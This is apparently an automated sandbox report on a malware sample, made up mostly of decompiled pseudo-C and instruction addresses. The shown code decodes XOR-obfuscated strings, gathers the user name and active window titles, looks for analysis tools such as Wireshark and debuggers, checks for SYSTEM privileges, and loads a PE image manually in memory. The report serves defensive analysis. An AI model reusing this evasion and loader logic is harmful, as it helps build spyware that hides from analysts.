																_t584 = _t584 + 8;
															}
														}
														_t348 =  *0x450fd1; // 0x0
														__eflags = _t348;
														if(_t348 != 0) {
															 *0x450fc8 =  *0x450fc8 ^ 0x0000002e;
															 *0x450fc9 =  *0x450fc9 ^ 0x0000002e;
															 *0x450fca =  *0x450fca ^ 0x0000002e;
															 *0x450fcb =  *0x450fcb ^ 0x0000002e;
															 *0x450fcc =  *0x450fcc ^ 0x0000002e;
															 *0x450fcd =  *0x450fcd ^ 0x0000002e;
															 *0x450fce =  *0x450fce ^ 0x0000002e;
															 *0x450fcf =  *0x450fcf ^ 0x0000002e;
															 *0x450fd0 =  *0x450fd0 ^ 0x0000002e;
															_t355 = _t348 ^ 0x0000002e;
															__eflags = _t355;
															 *0x450fd1 = _t355;
														}
														_t512 = 0x450fc8;
														_v340 = 0;
														_v324 = 0;
														_v320 = 0xf;
														_t194 =  &(_t512[1]); // 0x450fc9
														_t542 = _t194;
														do {
															_t349 =  *_t512;
															_t512 =  &(_t512[1]);
															__eflags = _t349;
														} while (_t349 != 0);
														E004026C0(_t456,  &_v340, 0x450fc8, _t512 - _t542);
														__eflags = _v320 - 0x10;
														_t456 = 3;
														_t352 =  >=  ? _v340 :  &_v340;
														_t354 = E00410160( &_v284,  >=  ? _v340 :  &_v340);
														_t584 = _t584 + 8;
														_v313 = 0;
														__eflags = _t354;
														if(_t354 != 0) {
															goto L131;
														}
													}
													__eflags = _t456 & 0x00000002;
													if((_t456 & 0x00000002) == 0) {
														L138:
														__eflags = _t456 & 0x00000001;
														if((_t456 & 0x00000001) == 0) {
															L143:
															__eflags = _v313;
															if(_v313 != 0) {
																goto L145;
															} else {
																goto L144;
															}
															L146:
															 *[fs:0x0] = _v24;
															_pop(_t553);
															_pop(_t565);
															_pop(_t454);
															__eflags = _v28 ^ _t571;
															return E0040EB3F(_t298, _t454, _v28 ^ _t571, _t542, _t553, _t565);
														} else {
															_t542 = _v344;
															__eflags = _t542 - 0x10;
															if(_t542 < 0x10) {
																goto L143;
															} else {
																_t506 = _v364;
																_t542 =  &(_t542[0]);
																_t319 = _t506;
																__eflags = _t542 - 0x1000;
																if(_t542 < 0x1000) {
																	L142:
																	_push(_t542);
																	E0040ED7F(_t506);
																	goto L143;
																} else {
																	_t506 =  *(_t506 - 4);
																	_t542 =  &(_t542[8]);
																	__eflags = _t319 - _t506 + 0xfffffffc - 0x1f;
																	if(__eflags > 0) {
																		goto L147;
																	} else {
																		goto L142;
																	}
																}
															}
														}
													} else {
														_t542 = _v320;
														_t456 = _t456 & 0xfffffffd;
														__eflags = _t542 - 0x10;
														if(_t542 < 0x10) {
															L137:
															_v324 = 0;
															_v320 = 0xf;
															_v340 = 0;
															goto L138;
														} else {
															_t511 = _v340;
															_t542 =  &(_t542[0]);
															_t343 = _t511;
															__eflags = _t542 - 0x1000;
															if(_t542 < 0x1000) {
																L136:
																_push(_t542);
																E0040ED7F(_t511);
																_t584 = _t584 + 8;
																goto L137;
															} else {
																_t511 =  *(_t511 - 4);
																_t542 =  &(_t542[8]);
																__eflags = _t343 - _t511 + 0xfffffffc - 0x1f;
																if(__eflags > 0) {
																	L147:
																	E004134A7(_t456, _t542, __eflags);
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	_push(_t571);
																	_t572 = _t584;
																	_t324 =  *0x43d054; // 0x8e1b5714
																	_v792 = _t324 ^ _t572;
																	_v876 = 0;
																	_v872 = 0x500;
																	_t328 = OpenProcessToken(GetCurrentProcess(), 8,  &_v884);
																	__eflags = _t328;
																	if(_t328 == 0) {
																		L151:
																		__eflags = _v20 ^ _t572;
																		return E0040EB3F(0, _t456, _v20 ^ _t572, _t542, _t555, _t564);
																	} else {
																		_t333 = GetTokenInformation(_v112, 1,  &_v96, 0x4c,  &_v108); // executed
																		_push(_v112);
																		__eflags = _t333;
																		if(_t333 != 0) {
																			CloseHandle();
																			_t337 = AllocateAndInitializeSid( &_v104, 1, 0x12, 0, 0, 0, 0, 0, 0, 0,  &_v116);
																			__eflags = _t337;
																			if(_t337 == 0) {
																				goto L151;
																			} else {
																				_t338 = EqualSid(_v96, _v116);
																				FreeSid(_v116);
																				__eflags = _v20 ^ _t572;
																				_t567 = _t564;
																				return E0040EB3F(_t338, _t456, _v20 ^ _t572, _t542, _t555, _t567);
																			}
																		} else {
																			CloseHandle();
																			goto L151;
																		}
																	}
																} else {
																	goto L136;
																}
															}
														}
													}
												}
											}
										}
									}
								} else {
									_t382 = _t550 - _t541;
									__eflags = _t382 - _t452;
									_t457 =  <  ? _t382 : _t452;
									__eflags =  *((intOrPtr*)(_t562 + 0x14)) - 0x10;
									if( *((intOrPtr*)(_t562 + 0x14)) >= 0x10) {
										_t562 =  *_t562;
									}
									_t556 = _t550 - _t457;
									 *_v12 = _t556;
									__eflags = _t556 - _t541 + 1;
									_t286 = E00410440(_t562 + _t541, _t562 + _t541 + _t457, _t556 - _t541 + 1);
									goto L87;
								}
							}
						} else {
							goto L12;
						}
					}
				}
				L6:
				_t240 =  *_t459;
				_t459 =  &(_t459[1]);
				if(_t240 != 0) {
					goto L6;
				} else {
					E004026C0(_t447,  &_v348, 0x450f08, _t459 - _t525);
					_t19 =  &_v296; // 0x47434a4f
					_v8 = 1;
					_t548 = GetUserNameA;
					_v296 = 0x101;
					GetUserNameA( &_v288, _t19); // executed
					_t462 =  &_v288;
					_v372 = 0;
					_v356 = 0;
					_t526 = _t462 + 1;
					_v352 = 0xf;
				}
				goto L8;
			}

0x004056a0
0x004056a0
0x004056a3
0x004056a5
0x004056b0
0x004056b1
0x004056b7
0x004056bc
0x004056be
0x004056c1
0x004056c3
0x004056c4
0x004056c8
0x004056ce
0x004056d8
0x004056e2
0x004056ec
0x004056f3
0x00405700
0x0040570a
0x00405713
0x00405715
0x00405720
0x00405727
0x0040572c
0x0040572f
0x00405736
0x00405738
0x0040573e
0x0040574f
0x00405755
0x0040575f
0x00405764
0x00405764
0x00405736
0x00405767
0x0040576e
0x00405770
0x00405777
0x0040577e
0x00405785
0x0040578c
0x00405795
0x00405795
0x0040579a
0x0040579f
0x004057a9
0x004057b3
0x004057bd
0x004057c4
0x004057c4
0x004057c4
0x00405830
0x00405830
0x00405830
0x00405832
0x00405833
0x00405847
0x00405852
0x00405858
0x0040585d
0x00405863
0x00405868
0x00405899
0x00405899
0x0040589d
0x004058a6
0x004058d7
0x004058d9
0x00405e74
0x00405e79
0x00405e81
0x00405e82
0x00405e83
0x00405e91
0x004058df
0x004058df
0x004058e6
0x004058f6
0x004058fd
0x00405902
0x00405905
0x0040590c
0x0040590e
0x00405919
0x0040591e
0x00405924
0x0040592e
0x00405933
0x00405933
0x0040590c
0x00405936
0x0040593d
0x0040593f
0x00405945
0x0040594b
0x00405951
0x00405959
0x00405959
0x0040595e
0x00405963
0x0040596d
0x00405977
0x00405981
0x00405988
0x00405988
0x00405990
0x00405990
0x00405992
0x00405993
0x004059a5
0x004059aa
0x004059b0
0x004059bb
0x004059c6
0x004059c8
0x004059ce
0x004059d8
0x004059e2
0x004059e5
0x004059f0
0x004059f0
0x004059f2
0x004059f3
0x00405a07
0x00405a12
0x00405a18
0x00405a1d
0x00405a23
0x00405a28
0x00405a59
0x00405a59
0x00405a5d
0x00405a66
0x00405a97
0x00405a99
0x00000000
0x00405a9f
0x00405a9f
0x00405aa4
0x00405aae
0x00405ab8
0x00405ac7
0x00405ace
0x00405ad3
0x00405ad6
0x00405add
0x00405adf
0x00405af3
0x00405afb
0x00405b01
0x00405b0b
0x00405b10
0x00405b10
0x00405add
0x00405b13
0x00405b1a
0x00405b1c
0x00405b23
0x00405b2a
0x00405b31
0x00405b38
0x00405b3f
0x00405b46
0x00405b4d
0x00405b54
0x00405b5d
0x00405b5d
0x00405b62
0x00405b67
0x00405b71
0x00405b7b
0x00405b85
0x00405b8c
0x00405b8c
0x00405b90
0x00405b90
0x00405b92
0x00405b93
0x00405ba5
0x00405baa
0x00405bb0
0x00405bbb
0x00405bc6
0x00405bc8
0x00405bce
0x00405bd8
0x00405be2
0x00405be5
0x00405bf0
0x00405bf0
0x00405bf2
0x00405bf3
0x00405c07
0x00405c18
0x00405c1d
0x00405c23
0x00405c28
0x00405c59
0x00405c59
0x00405c5d
0x00405c66
0x00405c97
0x00405c99
0x00000000
0x00405c9f
0x00405c9f
0x00405cb2
0x00405cb8
0x00405cbe
0x00405cc1
0x00405cc1
0x00405cc3
0x00405cc4
0x00405cd8
0x00405ce9
0x00405cee
0x00405cf3
0x00405cf9
0x00405d00
0x00405d0c
0x00405d11
0x00405d16
0x00000000
0x00000000
0x00405d28
0x00405d2d
0x00405d32
0x00405d44
0x00405d49
0x00405d4e
0x00405d60
0x00405d65
0x00405d6a
0x00405d70
0x00405d76
0x00405d80
0x00405d80
0x00405d82
0x00405d83
0x00405d87
0x00405d89
0x00405d8d
0x00405d90
0x00405d9e
0x00405da5
0x00405da8
0x00405da9
0x00405d90
0x00405db9
0x00405dbe
0x00405dc3
0x00405dd1
0x00405dd6
0x00405ddb
0x00405de2
0x00405de4
0x00405df7
0x00405dfd
0x00405e03
0x00405e06
0x00405e06
0x00405e08
0x00405e09
0x00405e1d
0x00405e2e
0x00405e33
0x00405e38
0x00000000
0x00000000
0x00405e38
0x00405ddb
0x00405dc3
0x00405d6a
0x00405d4e
0x00000000
0x00405d32
0x00405d00
0x00405e3e
0x00405e3e
0x00405e47
0x00000000
0x00405e49
0x00405e49
0x00405e4f
0x00405e50
0x00405e58
0x00405e6a
0x00405e6a
0x00405e6c
0x00000000
0x00405e5a
0x00405e5a
0x00405e5d
0x00405e68
0x00000000
0x00000000
0x00000000
0x00000000
0x00405e68
0x00405e58
0x00405e47
0x00405c68
0x00405c68
0x00405c6e
0x00405c6f
0x00405c77
0x00405c8d
0x00405c8d
0x00405c8f
0x00405c94
0x00000000
0x00405c79
0x00405c79
0x00405c7c
0x00405c87
0x00000000
0x00000000
0x00000000
0x00000000
0x00405c87
0x00405c77
0x00405c2a
0x00405c2a
0x00405c30
0x00405c31
0x00405c39
0x00405c4f
0x00405c4f
0x00405c51
0x00405c56
0x00000000
0x00405c3b
0x00405c3b
0x00405c3e
0x00405c49
0x00000000
0x00000000
0x00000000
0x00000000
0x00405c49
0x00405c39
0x00405c28
0x00405a68
0x00405a68
0x00405a6e
0x00405a6f
0x00405a77
0x00405a8d
0x00405a8d
0x00405a8f
0x00405a94
0x00000000
0x00405a79
0x00405a79
0x00405a7c
0x00405a87
0x00000000
0x00000000
0x00000000
0x00000000
0x00405a87
0x00405a77
0x00405a2a
0x00405a2a
0x00405a30
0x00405a31
0x00405a39
0x00405a4f
0x00405a4f
0x00405a51
0x00405a56
0x00000000
0x00405a3b
0x00405a3b
0x00405a3e
0x00405a49
0x00000000
0x00000000
0x00000000
0x00000000
0x00405a49
0x00405a39
0x00405a28
0x004058a8
0x004058a8
0x004058ae
0x004058af
0x004058b7
0x004058cd
0x004058cd
0x004058cf
0x004058d4
0x00000000
0x004058b9
0x004058b9
0x004058bc
0x004058c7
0x00000000
0x00000000
0x00000000
0x00000000
0x004058c7
0x004058b7
0x0040586a
0x0040586a
0x00405870
0x00405871
0x00405879
0x0040588f
0x0040588f
0x00405891
0x00405896
0x00000000
0x0040587b
0x0040587b
0x0040587e
0x00405889
0x00405e94
0x00405e94
0x00405e99
0x00405e9a
0x00405e9b
0x00405e9c
0x00405e9d
0x00405e9e
0x00405e9f
0x00405ea0
0x00405ea1
0x00405ea3
0x00405ea4
0x00405ea8
0x00405eaa
0x00405eab
0x00405eac
0x00405ead
0x00405eaf
0x00405eb1
0x00405eb1
0x00405eb3
0x00405eb7
0x00405eb9
0x00405eb9
0x00405ebb
0x00405ebe
0x00405ec1
0x00405ec5
0x00405ecb
0x00405ed0
0x00405ed2
0x00405ed5
0x00405ed8
0x00405f0a
0x00405f10
0x00405eda
0x00405eda
0x00405edc
0x00405f11
0x00405f16
0x00405f17
0x00405f18
0x00405f19
0x00405f1a
0x00405f1b
0x00405f1c
0x00405f1d
0x00405f1e
0x00405f1f
0x00405f20
0x00405f21
0x00405f22
0x00405f23
0x00405f24
0x00405f25
0x00405f26
0x00405f27
0x00405f28
0x00405f29
0x00405f2a
0x00405f2b
0x00405f2c
0x00405f2d
0x00405f2e
0x00405f2f
0x00405f30
0x00405f31
0x00405f32
0x00405f33
0x00405f34
0x00405f35
0x00405f36
0x00405f37
0x00405f38
0x00405f39
0x00405f3a
0x00405f3b
0x00405f3c
0x00405f3d
0x00405f3e
0x00405f3f
0x00405f40
0x00405f41
0x00405f43
0x00405f45
0x00405f50
0x00405f51
0x00405f57
0x00405f5c
0x00405f5e
0x00405f61
0x00405f62
0x00405f63
0x00405f64
0x00405f68
0x00405f6e
0x00405f7e
0x00405f88
0x00405f92
0x00405f94
0x00405f99
0x00405f9f
0x00405fa6
0x00405fab
0x00405fae
0x00405fb5
0x00405fb7
0x00405fbd
0x00405fc8
0x00405fcd
0x00405fd3
0x00405fe0
0x00405fe5
0x00405fe5
0x00405fb5
0x00405fe8
0x00405fed
0x00405fef
0x00405ff1
0x00405ff8
0x00405fff
0x00406006
0x0040600d
0x00406014
0x0040601b
0x00406022
0x00406022
0x00406024
0x00406024
0x00406029
0x0040602c
0x00406031
0x00406033
0x00406033
0x00406036
0x0040603c
0x00406043
0x0040604a
0x00406050
0x00406050
0x00406052
0x00406053
0x00406053
0x00406061
0x00406066
0x0040606b
0x0040606e
0x00406070
0x004065ae
0x004065ae
0x00000000
0x00406076
0x00406076
0x0040607b
0x00406085
0x0040608f
0x00406095
0x0040609c
0x004060a1
0x004060a4
0x004060ab
0x004060ad
0x004060b3
0x004060be
0x004060c3
0x004060c9
0x004060d6
0x004060db
0x004060db
0x004060ab
0x004060de
0x004060e3
0x004060e5
0x004060e7
0x004060ee
0x004060f5
0x004060fc
0x00406103
0x0040610a
0x00406111
0x00406118
0x00406118
0x0040611a
0x0040611a
0x0040611f
0x00406122
0x00406127
0x00406129
0x00406129
0x0040612c
0x00406132
0x00406139
0x00406140
0x00406140
0x00406142
0x00406143
0x00406143
0x0040614f
0x00406151
0x00406156
0x0040615b
0x0040615e
0x00406160
0x00000000
0x00406166
0x00406166
0x0040616b
0x00406175
0x0040617f
0x00406188
0x0040618e
0x00406195
0x0040619a
0x0040619d
0x004061a4
0x004061a6
0x004061ba
0x004061c2
0x004061c8
0x004061d5
0x004061da
0x004061da
0x004061a4
0x004061dd
0x004061e2
0x004061e4
0x004061e6
0x004061ed
0x004061f4
0x004061fb
0x00406202
0x00406209
0x00406210
0x00406217
0x0040621e
0x00406225
0x00406225
0x00406227
0x00406227
0x0040622c
0x0040622f
0x00406234
0x00406236
0x00406236
0x00406239
0x0040623f
0x00406246
0x00406250
0x00406250
0x00406252
0x00406253
0x00406253
0x00406261
0x00406266
0x0040626b
0x0040626e
0x00406270
0x00000000
0x00406276
0x00406276
0x0040627c
0x0040627e
0x004065aa
0x004065aa
0x00000000
0x00406284
0x00406291
0x00406297
0x0040629e
0x004062a8
0x004062b2
0x004062bc
0x004062c5
0x004062cb
0x004062d2
0x004062d7
0x004062da
0x004062e1
0x004062e3
0x004062e9
0x004062f1
0x004062f6
0x00406302
0x0040630a
0x00406310
0x00406316
0x00406323
0x00406328
0x00406328
0x004062e1
0x0040632b
0x00406332
0x00406334
0x00406334
0x00406336
0x00406336
0x0040633c
0x0040633d
0x0040633d
0x00406336
0x00406342
0x00406347
0x00406351
0x0040635b
0x00406365
0x0040636c
0x0040636c
0x00406370
0x00406370
0x00406372
0x00406373
0x00406373
0x00406385
0x0040638a
0x00406397
0x0040639e
0x004063a3
0x004063a9
0x004063b8
0x004063bd
0x004063c0
0x004063c2
0x00406502
0x00406502
0x004063c8
0x004063c8
0x004063cd
0x004063d7
0x004063e1
0x004063ea
0x004063f0
0x004063f7
0x004063fc
0x004063ff
0x00406406
0x00406408
0x00406410
0x0040641c
0x00406424
0x0040642a
0x00406437
0x0040643c
0x0040643c
0x00406406
0x0040643f
0x00406444
0x00406446
0x00406448
0x0040644f
0x00406456
0x0040645d
0x00406464
0x0040646b
0x00406472
0x00406479
0x00406480
0x00406487
0x00406487
0x00406489
0x00406489
0x0040648e
0x00406493
0x0040649d
0x004064a7
0x004064b1
0x004064b1
0x004064b4
0x004064b4
0x004064b6
0x004064b7
0x004064b7
0x004064c9
0x004064ce
0x004064db
0x004064e0
0x004064ef
0x004064f4
0x004064f7
0x004064fe
0x00406500
0x00000000
0x00000000
0x00406500
0x00406509
0x0040650c
0x00406566
0x00406566
0x00406569
0x004065a1
0x004065a1
0x004065a8
0x00000000
0x00000000
0x00000000
0x00000000
0x004065b0
0x004065b3
0x004065bb
0x004065bc
0x004065bd
0x004065c1
0x004065cb
0x0040656b
0x0040656b
0x00406571
0x00406574
0x00000000
0x00406576
0x00406576
0x0040657c
0x0040657d
0x0040657f
0x00406585
0x00406597
0x00406597
0x00406599
0x00000000
0x00406587
0x00406587
0x0040658a
0x00406592
0x00406595
0x00000000
0x00000000
0x00000000
0x00000000
0x00406595
0x00406585
0x00406574
0x0040650e
0x0040650e
0x00406514
0x00406517
0x0040651a
0x0040654b
0x0040654b
0x00406555
0x0040655f
0x00000000
0x0040651c
0x0040651c
0x00406522
0x00406523
0x00406525
0x0040652b
0x00406541
0x00406541
0x00406543
0x00406548
0x00000000
0x0040652d
0x0040652d
0x00406530
0x00406538
0x0040653b
0x004065cc
0x004065cc
0x004065d1
0x004065d2
0x004065d3
0x004065d4
0x004065d5
0x004065d6
0x004065d7
0x004065d8
0x004065d9
0x004065da
0x004065db
0x004065dc
0x004065dd
0x004065de
0x004065df
0x004065e0
0x004065e1
0x004065e6
0x004065ed
0x004065f3
0x004065fd
0x0040660a
0x00406610
0x00406612
0x00406636
0x0040663b
0x00406645
0x00406614
0x00406623
0x00406629
0x0040662c
0x0040662e
0x00406646
0x00406666
0x0040666c
0x0040666e
0x00000000
0x00406670
0x00406677
0x00406682
0x0040668d
0x0040668f
0x00406698
0x00406698
0x00406630
0x00406630
0x00000000
0x00406630
0x0040662e
0x00000000
0x00000000
0x00000000
0x0040653b
0x0040652b
0x0040651a
0x0040650c
0x0040627e
0x00406270
0x00406160
0x00405ede
0x00405ee0
0x00405ee2
0x00405ee4
0x00405ee7
0x00405eeb
0x00405eed
0x00405eed
0x00405ef5
0x00405ef7
0x00405efb
0x00405f02
0x00000000
0x00405f07
0x00405edc
0x00000000
0x00000000
0x00000000
0x00405889
0x00405879
0x004057c7
0x004057c7
0x004057c9
0x004057cc
0x00000000
0x004057ce
0x004057dc
0x004057e1
0x004057e7
0x004057eb
0x004057f8
0x00405803
0x00405805
0x0040580b
0x00405815
0x0040581f
0x00405822
0x00405822
0x00000000

APIs

__Init_thread_footer.LIBCMT ref: 0040575F

Part of subcall function 0040EE7E: EnterCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F40,?,?,00450F44,00450F45), ref: 0040EE88
Part of subcall function 0040EE7E: LeaveCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F40,?,?,00450F44,00450F45), ref: 0040EEBB
Part of subcall function 0040EE7E: RtlWakeAllConditionVariable.NTDLL ref: 0040EF32

__Init_thread_footer.LIBCMT ref: 0040592E
GetUserNameA.ADVAPI32(?,}FOF@.), ref: 004059C6
GetUserNameA.ADVAPI32(?,OJCG@.), ref: 00405803

Part of subcall function 0040EEC8: EnterCriticalSection.KERNEL32(004504FC,00450D61,?,?,004063FC,00450F40,00450F44,00450F45), ref: 0040EED3
Part of subcall function 0040EEC8: LeaveCriticalSection.KERNEL32(004504FC,?,?,004063FC,00450F40,00450F44,00450F45), ref: 0040EF10

__Init_thread_footer.LIBCMT ref: 00405B0B
GetUserNameA.ADVAPI32(?,lK@MF.), ref: 00405BC6
GetForegroundWindow.USER32(?,?), ref: 00405C9F
GetWindowTextA.USER32 ref: 00405CB2
Sleep.KERNELBASE(00000258), ref: 00405DE2
GetForegroundWindow.USER32 ref: 00405DE4
GetWindowTextA.USER32 ref: 00405DF7

Strings

debug, xrefs: 00405DCB
Wireshark, xrefs: 00405D3E
ZK]Z, xrefs: 00405AA4
dbg, xrefs: 00405DB3
HTTP Analyzer, xrefs: 00405D22
OJCG@., xrefs: 00405738
roxifier, xrefs: 00405D06
Far , xrefs: 00405CE3, 00405E28
NetworkMiner, xrefs: 00405D5A

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: CriticalSectionWindow$Init_thread_footerNameUser$EnterForegroundLeaveText$ConditionSleepVariableWake
String ID: Far $HTTP Analyzer$NetworkMiner$OJCG@.$Wireshark$ZK]Z$dbg$debug$roxifier
API String ID: 3399126515-619935782
Opcode ID: e81aba006f93a7dde4f366857370b7f543270ab0442f7a5a63ef08b9e01195eb
Instruction ID: 00bc03c8be44a200bf8c7c036dcd579c5d236b3a798ad5d2a4514fdefae62dcd
Opcode Fuzzy Hash: e81aba006f93a7dde4f366857370b7f543270ab0442f7a5a63ef08b9e01195eb
Instruction Fuzzy Hash: 26123571900288DADB29DB24DC49BEB7774EB06309F1041FAD448A72D2DB799E89CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00402F20 Relevance: 35.5, APIs: 11, Strings: 9, Instructions: 504
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 59%

			E00402F20(signed int* __ecx, signed int __edx) {
				signed int _v8;
				signed int _v40;
				char _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				void* _v72;
				long _v76;
				intOrPtr _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t181;
				void* _t190;
				long _t192;
				long _t197;
				void* _t198;
				void* _t202;
				void* _t204;
				signed int _t206;
				signed int _t207;
				signed int _t212;
				void* _t214;
				intOrPtr _t215;
				intOrPtr* _t218;
				intOrPtr* _t224;
				signed int* _t226;
				signed int* _t229;
				void* _t234;
				signed int _t235;
				signed int _t236;
				signed char _t237;
				void _t238;
				signed int _t241;
				void* _t250;
				void* _t259;
				void* _t266;
				intOrPtr _t269;
				signed int _t279;
				signed char _t280;
				signed int _t281;
				void* _t282;
				signed int _t284;
				signed int _t291;
				signed int _t292;
				signed int _t294;
				void* _t297;
				intOrPtr _t306;
				intOrPtr _t310;
				void* _t315;
				void* _t324;
				signed int _t326;
				signed short* _t327;
				void* _t328;
				signed int _t330;
				long _t333;
				long _t334;
				void* _t335;
				void* _t336;
				void* _t337;
				void* _t338;
				signed int _t339;
				signed int _t340;
				signed int _t341;
				void* _t342;
				void* _t343;
				void* _t344;
				intOrPtr _t346;
				void* _t348;
				void* _t350;
				void* _t352;
				intOrPtr _t353;
				void* _t354;
				void* _t355;
				void* _t356;
				intOrPtr* _t357;
				signed int _t361;
				signed int _t363;
				void* _t364;
				intOrPtr _t366;
				signed int _t368;
				intOrPtr _t369;
				void* _t370;
				void* _t371;
				void* _t372;
				signed int _t373;
				void* _t374;
				void* _t375;
				void* _t376;

				_t181 =  *0x43d054; // 0x8e1b5714
				_v8 = _t181 ^ _t373;
				_t276 = __edx;
				_t322 = __ecx;
				_t346 = 0;
				_v56 = __edx;
				_v48 = __ecx;
				if(__edx >= 0x40) {
					if( *__ecx == 0x5a4d) {
						_t279 = __ecx[0xf];
						_v68 = _t279;
						if(__edx >= _t279 + 0xf8) {
							_t276 = __ecx + _t279;
							_v64 = _t276;
							if( *(__ecx + _t279) == 0x4550) {
								if( *((intOrPtr*)(_t276 + 4)) == 0x14c) {
									_t280 =  *(_t276 + 0x38);
									if((_t280 & 0x00000001) == 0) {
										_t330 =  *(_t276 + 6) & 0x0000ffff;
										_t324 = ( *(_t276 + 0x14) & 0x0000ffff) + 0x24;
										if(_t330 != 0) {
											_t328 = _t324 + _t276;
											do {
												_t269 =  *((intOrPtr*)(_t328 + 4));
												_t328 = _t328 + 0x28;
												_t314 =  !=  ? _t269 : _t280;
												_t315 = ( !=  ? _t269 : _t280) +  *((intOrPtr*)(_t328 - 0x28));
												_t316 =  <=  ? _t346 : _t315;
												_t346 =  <=  ? _t346 : _t315;
												_t280 =  *(_t276 + 0x38);
												_t330 = _t330 - 1;
											} while (_t330 != 0);
										}
										__imp__GetNativeSystemInfo( &_v44); // executed
										_t281 = _v40;
										_t322 =  !(_t281 - 1);
										_t333 = _t281 - 0x00000001 +  *((intOrPtr*)(_t276 + 0x50)) & _t322;
										if(_t333 == (_t281 - 0x00000001 + _t346 & _t322)) {
											_t190 = VirtualAlloc( *(_t276 + 0x34), _t333, 0x3000, 4); // executed
											_v72 = _t190;
											if(_t190 != 0) {
												L22:
												_t192 = HeapAlloc(GetProcessHeap(), 8, 0x40);
												_t282 = _v72;
												_t334 = _t192;
												_v76 = _t334;
												if(_t334 != 0) {
													 *(_t334 + 4) = _t282;
													 *((intOrPtr*)(_t334 + 0x1c)) = E00402EA0;
													 *(_t334 + 0x14) = ( *(_t276 + 0x16) & 0x0000ffff) >> 0x0000000d & 0x00000001;
													 *((intOrPtr*)(_t334 + 0x20)) = E00402EC0;
													 *((intOrPtr*)(_t334 + 0x24)) = E00402EE0;
													 *((intOrPtr*)(_t334 + 0x28)) = E00402EF0;
													 *((intOrPtr*)(_t334 + 0x2c)) = E00402F10;
													 *((intOrPtr*)(_t334 + 0x34)) = 0;
													 *(_t334 + 0x3c) = _v40;
													_t197 =  *(_t276 + 0x54);
													if(_v56 >= _t197) {
														_t198 = VirtualAlloc(_t282, _t197, 0x1000, 4); // executed
														_t348 = _t198;
														E00410440(_t348, _v48,  *(_t276 + 0x54));
														_t375 = _t374 + 0xc;
														_v60 = 0;
														_t202 = _t348 + _v48[0xf];
														 *_t334 = _t202;
														 *((intOrPtr*)(_t202 + 0x34)) = _v72;
														_t284 =  *_t334;
														_t322 =  *(_t334 + 4);
														_v52 = _t322;
														_t204 = ( *(_t284 + 0x14) & 0x0000ffff) + 0x24;
														if(0 >=  *(_t284 + 6)) {
															L40:
															_t206 =  *((intOrPtr*)(_t284 + 0x34)) -  *(_t276 + 0x34);
															_v64 = _t206;
															if(_t206 == 0) {
																L52:
																_t207 = 1;
															} else {
																if( *((intOrPtr*)(_t284 + 0xa4)) != 0) {
																	_t322 =  *(_t334 + 4);
																	_t276 =  *((intOrPtr*)(_t284 + 0xa0)) + _t322;
																	_v56 = _t322;
																	_t238 =  *_t276;
																	if(_t238 != 0) {
																		do {
																			_t306 =  *((intOrPtr*)(_t276 + 4));
																			_v68 = _t238 + _t322;
																			_t327 = _t276 + 8;
																			_t364 = 0;
																			if((_t306 - 0x00000008 & 0xfffffffe) > 0) {
																				_t341 = _v68;
																				asm("o16 nop [eax+eax]");
																				do {
																					_t241 =  *_t327 & 0x0000ffff;
																					if((_t241 & 0x0000f000) == 0x3000) {
																						 *((intOrPtr*)((_t241 & 0x00000fff) + _t341)) =  *((intOrPtr*)((_t241 & 0x00000fff) + _t341)) + _v64;
																					}
																					_t306 =  *((intOrPtr*)(_t276 + 4));
																					_t364 = _t364 + 1;
																					_t327 =  &(_t327[1]);
																				} while (_t364 < _t306 - 8 >> 1);
																			}
																			_t238 =  *(_t276 + _t306);
																			_t276 = _t276 + _t306;
																			_t322 = _v56;
																		} while (_t238 != 0);
																		_t334 = _v76;
																	}
																	goto L52;
																} else {
																	_t207 = 0;
																}
															}
															 *((intOrPtr*)(_t334 + 0x18)) = _t207;
															if(E00402D30(_t334) == 0) {
																goto L27;
															} else {
																_t276 =  *_t334;
																_t352 = _t276 + ( *(_t276 + 0x14) & 0x0000ffff);
																_t212 =  *(_t352 + 0x20);
																_t291 =  ~( *(_t334 + 0x3c)) & _t212;
																_v64 = _t291;
																_v92 = _t291;
																_t292 =  *((intOrPtr*)(_t352 + 0x28));
																_v60 = _t212;
																_v96 = _t212;
																if(_t292 == 0) {
																	_t237 =  *(_t352 + 0x3c);
																	if((_t237 & 0x00000040) == 0) {
																		if(_t237 < 0) {
																			_t292 =  *((intOrPtr*)(_t276 + 0x24));
																		}
																	} else {
																		_t292 =  *((intOrPtr*)(_t276 + 0x20));
																	}
																}
																_t326 =  *(_t352 + 0x3c);
																_v88 = _t292;
																_v84 = _t326;
																_v80 = 0;
																_v68 = 1;
																if(1 >=  *(_t276 + 6)) {
																	L76:
																	_t322 =  &_v96;
																	_v80 = 1;
																	_t214 = E00402C00(_t276, _t334,  &_v96); // executed
																	if(_t214 == 0) {
																		goto L27;
																	} else {
																		_t322 =  *_t334;
																		_t294 = _t322;
																		_t353 =  *((intOrPtr*)(_t322 + 0xc0));
																		if(_t353 != 0) {
																			_t276 =  *(_t334 + 4);
																			_t357 =  *((intOrPtr*)(_t276 + _t353 + 0xc));
																			if(_t357 != 0) {
																				_t224 =  *_t357;
																				if(_t224 != 0) {
																					do {
																						 *_t224(_t276, 1, 0);
																						_t224 =  *((intOrPtr*)(_t357 + 4));
																						_t357 = _t357 + 4;
																					} while (_t224 != 0);
																					_t294 =  *_t334;
																				}
																			}
																		}
																		_t215 =  *((intOrPtr*)(_t294 + 0x28));
																		if(_t215 == 0) {
																			 *((intOrPtr*)(_t334 + 0x38)) = 0;
																			_pop(_t336);
																			_pop(_t354);
